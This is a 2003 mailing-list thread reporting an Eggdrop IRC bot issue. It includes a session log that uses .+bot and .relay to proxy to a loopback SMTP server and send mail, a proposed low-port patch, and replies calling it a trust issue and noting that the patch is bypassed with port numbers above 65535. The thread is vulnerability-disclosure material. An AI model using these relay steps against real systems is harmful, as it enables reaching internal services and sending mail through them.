Re: Eggdrop arbitrary connection vulnerability

[Matthew S. Hallacy]

On Sun, Feb 09, 2003 at 08:44:50PM +0100, Paul Starzetz wrote:
> Hi,

Hello.

> 
> there is a serious security problem in the popular eggdrop IRCbot. The 
> hole allows a regular user with enough 'power' (at least power to add 
> new bot records) to use any linked instance of the bot on the botnet as 
> an instant 'proxy'. The following session demonstrates the problem with 
> an out-of-the-box eggdrop 1.6.10:

This is not a bug. When running a program, any program, the owner of
the process has the responsibility of making sure that they trust the
people they give access.

Not only is partyline access required, but they must also have access
to either add, or modify bots. In the past many people have used this
particular 'feature' for various things, including connecting to other
bots that may not be compatible with the eggdrop botnet protocol.

I personally have also used this to verify that services are available
that I cannot reach directly (ssh, http, ftp, etc). Others have written
scripts (in Tcl, the script language available to eggdrop) that interact
with various services, including FTP, SMTP, HTTP, and POP3.

To conclude, if you see this as a security threat, please feel free to
remove the user flags from the people that you do not trust to refrain
from abusing it. It is not necessary (nor the default behavior) for a
user to have the ability to do this (or even use the .relay command).

[snip]

> Hope this helps, thanks to Maciek Kroenke for bringing my attention to 
> this bug,

Next time you feel that you've found a 'bug' in eggdrop please refer to
the mailing lists at http://www.eggheads.org, or our bugzilla server at
http://www.eggheads.org/bugzilla


> /ih

-- 
Matthew S. HallacyFUBAR, LART, BOFH Certified
http://www.poptix.net   GPG public key 0x01938203

Re: Eggdrop arbitrary connection vulnerability

[D.C. van Moolenbroek]

That's not really a bug, it's mostly an issue of trust: if you give people
the ability to link bots, they can also abuse this power and "link" to
something else. If you don't want people to be able to use your eggdrop as a
proxy, simply don't give them the flags to add/edit bot records.

Your patch will not work effectively, by the way, as the port number one
specifies using the .+bot command is internally handled as an int (and
unsigned int at some other places), and not truncated to an unsigned short
until it's put in the socket address structure using the htons() call; so if
a malicious bot master uses a port number above 65535, he/she will bypass
the low port check. Also, the patch will break some eggdrop TCL scripts,
since eggdrop's "connect" TCL command relies on the open_telnet_raw()
function as well.

A real solution for this relay issue would be to let the two bots
communicate with eachother (challenge/response'ish) before allowing the user
to send something to the other bot. This would probably be relatively easy
to implement in new versions of eggdrop, although it would require all
eggdrops in a botnet to be upgraded simultaneously, in order not to break
.relay functionality. And even then, some port>=1024 checks would be
necessary in botnet.c, or a botmaster could still do a full portscan on an
arbitrary host if not all error reporting for .relay and .link (and
auto-linking) were stripped out as well.

Regards,

David

- Original Message -
From: "Paul Starzetz" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; "vendor-sec" <[EMAIL PROTECTED]>
Sent: Sunday, February 09, 2003 8:44 PM
Subject: Eggdrop arbitrary connection vulnerability


> Hi,
>
> there is a serious security problem in the popular eggdrop IRCbot. The
> hole allows a regular user with enough 'power' (at least power to add
> new bot records) to use any linked instance of the bot on the botnet as
> an instant 'proxy'. The following session demonstrates the problem with
> an out-of-the-box eggdrop 1.6.10:
>
>
> .+bot bighole 127.0.0.1:25
> [20:23] #IhaQuer# +bot bighole 127.0.0.1:25
> Added bot 'bighole' with address '127.0.0.1:25' and no password.
> You'll want to add a hostmask if this bot will ever be on any channels
> that I'm on.
>
> [20:23] #IhaQuer# match bighole
> *** Matching 'bighole':
> HANDLEPASS NOTES FLAGS   LAST
> bighole   no   0 b   never (nowhere   )
>   ADDRESS: 127.0.0.1
>  users: 25, bots: 25
> --- Found 1 match.
>
> .relay bighole
> [20:23] #IhaQuer# relay bighole
> Connecting to bighole @ 127.0.0.1:25 ...
> (Type *BYE* on a line by itself to abort.)
> Success!
>
> NOW CONNECTED TO RELAY BOT bighole ...
> (You can type *BYE* to prematurely close the connection.)
> *** IhaQuer left the party line.
>
> 220 server.org ESMTP Postfix
> HELO blahblah.org
> 250 server.org
> MAIL from: blahblah.org
> 250 Ok
> rcpt to: [EMAIL PROTECTED]
> 250 Ok
> data
> 354 End data with .
> blah blah
> .
> 250 Ok: queued as CFDFC2F012
>
> Obviously an email has been sent by the local postfix bound to the
> loopback address 127.0.0.1! The impact may depend on the host the bot is
> running on, including tunneling into internal networks, accessing
> services bound to the loopback only, bypassing TCP wrappers etc, etc.
>
> There is no clean solution so far, for my own I decided to modify the
> net.c file and add something like:
>
> int open_telnet_raw(int sock, char *server, int sport)
> .
> .
> .
> name.sin_family = AF_INET;
> name.sin_port = htons(port);
>
> +if(port < 1024 && port != 113) {
> +   putlog(LOG_MISC, "*", "WARNING attempt to connect to low port
> %s:%d", server, port);
> +return -1;
> +   }
>
>
> Hope this helps, thanks to Maciek Kroenke for bringing my attention to
> this bug,
>
> /ih
>
>

--
class sig{static void main(String[]s){for// D.C. van Moolenbroek
(int _=0;19>_;System.out.print((char)(52^// (CS student, VU, NL)
"Y`KbddaZ}`P#KJ#caBG".charAt(_++)-9)));}}// -Java sigs look bad-

Eggdrop arbitrary connection vulnerability

[Paul Starzetz]

Hi,

there is a serious security problem in the popular eggdrop IRCbot. The 
hole allows a regular user with enough 'power' (at least power to add 
new bot records) to use any linked instance of the bot on the botnet as 
an instant 'proxy'. The following session demonstrates the problem with 
an out-of-the-box eggdrop 1.6.10:


.+bot bighole 127.0.0.1:25
[20:23] #IhaQuer# +bot bighole 127.0.0.1:25
Added bot 'bighole' with address '127.0.0.1:25' and no password.
You'll want to add a hostmask if this bot will ever be on any channels 
that I'm on.

[20:23] #IhaQuer# match bighole
*** Matching 'bighole':
HANDLEPASS NOTES FLAGS   LAST
bighole   no   0 b   never (nowhere   )
 ADDRESS: 127.0.0.1
users: 25, bots: 25
--- Found 1 match.

.relay bighole
[20:23] #IhaQuer# relay bighole
Connecting to bighole @ 127.0.0.1:25 ...
(Type *BYE* on a line by itself to abort.)
Success!

NOW CONNECTED TO RELAY BOT bighole ...
(You can type *BYE* to prematurely close the connection.)
*** IhaQuer left the party line.

220 server.org ESMTP Postfix
HELO blahblah.org
250 server.org
MAIL from: blahblah.org
250 Ok
rcpt to: [EMAIL PROTECTED]
250 Ok
data
354 End data with .
blah blah
.
250 Ok: queued as CFDFC2F012

Obviously an email has been sent by the local postfix bound to the 
loopback address 127.0.0.1! The impact may depend on the host the bot is 
running on, including tunneling into internal networks, accessing 
services bound to the loopback only, bypassing TCP wrappers etc, etc.

There is no clean solution so far, for my own I decided to modify the 
net.c file and add something like:

int open_telnet_raw(int sock, char *server, int sport)
.
.
.
   name.sin_family = AF_INET;
   name.sin_port = htons(port);

+if(port < 1024 && port != 113) {
+   putlog(LOG_MISC, "*", "WARNING attempt to connect to low port 
%s:%d", server, port);
+return -1;
+   }


Hope this helps, thanks to Maciek Kroenke for bringing my attention to 
this bug,

/ih